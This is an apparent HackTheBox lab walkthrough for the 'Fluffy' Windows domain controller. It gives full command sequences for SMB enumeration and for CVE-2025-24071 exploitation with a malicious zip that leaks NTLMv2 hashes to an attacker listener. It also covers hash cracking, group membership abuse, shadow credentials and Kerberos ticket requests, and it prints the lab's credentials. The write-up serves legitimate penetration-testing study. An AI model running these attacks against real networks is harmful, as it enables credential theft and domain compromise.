Fluffy
IP Address: 10.10.11.69
Machine Information
As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account:
j.fleischman / J0elTHEM4n1990!
Challenge
Nmap
First, let's get started with identifying with the open ports and possible services that is running the target server.
sudo nmap -sS -sV -sC -vv -T5 10.10.11.69 -oA nmap/Fluffy.nmap
From the nmap result, it is clearly evident that the target IP is an IP of a Domain Controller of a Windows AD. The domain name of the DC is fluffy.htb
Let's add the domain name of our target server to our /etc/hosts file to be able to clearly communicate using the domain of the DC.
sudo nano /etc/hosts
and add the following contents:
<--IP Address--> fluffy.htb
SMB Enumeration
The easiest point that we can start to enumerate would be through the SMB Shares. For the test, we can attempt to login into the share using the guest account without any password using nxc
nxc smb fluffy.htb -u "guest" -p ""
The output means that the guest user account can be accessed through the SMB share without any password required. Let's take an advantage of this, but exploring the shares enabled to the guest account.
nxc smb fluffy.htb -u "guest" -p "" --shares
The IPC$ share seems to be readable to the guest account. With that, we can attempt to enumerate users with RID brute force option in nxc
nxc smb fluffy.htb -u "guest" -p "" --rid
Dump this user list into a file and format them to just contain the usernames (you might have to manually also clear the junk in the username list)
nxc smb fluffy.htb -u "guest" -p "" --rid > usernames.txt
cat usernames.txt | cut -d '\' -f 2 | cut -d ' ' -f 1 > updated-usernames.txt
In the list, we identify the user account j.fleischman, to which we are already provided with the user credentials from the machine description.
Username: j.fleischman
Password: J0elTHEM4n1990!
Make use of this account's access to list out the shares available.
nxc smb fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares
The IT folder, with both Read and Write permission is assigned to j.fleischman user account. Connect to the SMB share using smbclient and find out what is inside the folder.
smbclient //fluffy.htb/IT -U 'j.fleischman' -p
Inside the folder, we can list out many zip files and one pdf document. To analyse it further, download all the files onto your local computer using the get command.
get <--File Name-->
(Later we find out that we just need the upgrade_Notice.pdf file)
Diving into the PDF file found form the SMB Share. That PDF file talks about a recent Pen-test/ audit done on the domain controller.
Following the found CVEs of the domain controller, we find a relevant possible exploit of a CVE (CVE-2025-24071) which provides us with the NTLMv2 Hashes of the Domain controller.
CVE-2025-24071
A relevant and work GitHub Repository for exploiting the CVE-2025-24071 can be found Here .
As a first step, let's clone this repository into our attacker's machine.
git clone https://github.com/Marcejr117/CVE-2025-24071_PoC.git
NTLM Hash
The usage of the tool seems to be simple,
- create a malicious zip file.
python3 PoC.py Fluffy <--Attacker's IP-->
- Setup a listener
For that, we can use Responder.py file this GitHub repository.
git clone https://github.com/lgandx/Responder.git
Now, let's run Responder.py file interfacing our HackTheBox VPN Tunnel.
sudo python3 Responder.py -I tun0
- Upload the ZIP file.
Open another terminal and connect to the smb share.
smbclient //fluffy.htb/IT -U 'j.fleischman' -p
Upload the file using the put command
put exploit.zip exploit.zip
And immediately the Responder.py reflects us the vulnerable user's NTLMv2 hash.
Copy and add the hash into a text file (hash.txt) to crack for the password against the Rockyou.txt file using Hashcat.
Crack the hash
hashcat hash.txt <--Location to your-->/rockyou.txt
Kudos!!!! The password of the new user p.agila is cracked.
Blood Hound
To understand the complete structure and possible foot holds that we can try to exploit further, we can make use of Blood Hound
With the credentials obtained of the user account, pass it through blodhound-python connector which connects and gathers possible information from the domain controller.
bloodhound-python -u 'p.agila' -p '<--Password-->' -d fluffy.htb -ns 10.10.11.69 -c All --zip
In the BloodHound web application, upload the files generated from the Blood Hound connector.
Once uploaded, Under the explore tab, let's start to search from the user [email protected] account.
Clearly, skimming through the user account, we notice the user [email protected] is a part of the Service Accounts. And this Service Accounts has multiple other accounts part of the same group with GenericWrite permissions.
From the recommendation Linux abuse of the this GenericWrite privilege, we can exploit the vulnerability of Shadow Credentials.
Shadow Credentials
The Blog that I am following for this exploit is this
According to the Blog post, the first step, is to make sure that the p.agila is a part of the SERVICE ACCOUNTS where in the winrm_svc account is also in the same group.
net rpc group addmem "Service Accounts" "p.agila" -U "fluffy.htb"/"p.agila" -S "10.10.11.69"
Following the Linux Abuse section of the BloodHound, let's clone the pyWhisker github tool onto our attacker's machine.
git clone https://github.com/ShutdownRepo/pywhisker.git
Using this tool, we will list all the current (if) existing shadow credentials of winrm_svc account.
python3 pywhisker.py -d "fluffy.htb" -u "p.agila" -p "<--Password-->" --target "winrm_svc" --action "list"
It is empty
Hence, let's add a new KeyCredential to the winrm_svc account and export the key certificates.
python3 pywhisker.py -d "fluffy.htb" -u "p.agila" -p "<--Password-->" --target "winrm_svc" --action "add" --filename key --export PEM
Move those key_<--file--> to a suitable folder
With the key added to the winrm_svc account, we need to now request for a new TGT from the server.
For that, we will use another tool called PKINIT.
git clone https://github.com/dirkjanm/PKINITtools.git
Now request of the TGT
python3 gettgtpkinit.py -cert-pem ../Key/key_cert.pem -key-pem ../Key/key_priv.pem fluffy.htb/winrm_svc winrm_svc.ccache
If you too are get this error minikerberos.protocol.errors.KerberosError: Error Name: KRB_AP_ERR_SKEW Detail: "The clock skew is too great".
You need to adjust the time of your attacker computer (your Kali Linux) to the time of the DC (approximately difference of 5 minutes is accepted).
There we use a tool called FakeTime (Click Here to know more)
sudo apt install faketime
faketime -h
To get the time of the target DC, we can use a tool called ntpdate
ntpdate -q <--Domain Name-->
We just need the date and time of the server
Finally our command tools like this:
faketime "$(ntpdate -q fluffy.htb | cut -d ' ' -f 1,2)" python3 gettgtpkinit.py -cert-pem ../Key/key_cert.pem -key-pem ../Key/key_priv.pem fluffy.htb/winrm_svc winrm_svc.ccache
Save this ticket that was generated into a file.
In our attacker's machine, we need to set the Kerberos ticket environment variable to use the obtained TGT of the winrm_svc account
export KRB5CCNAME=winrm_svc.ccache
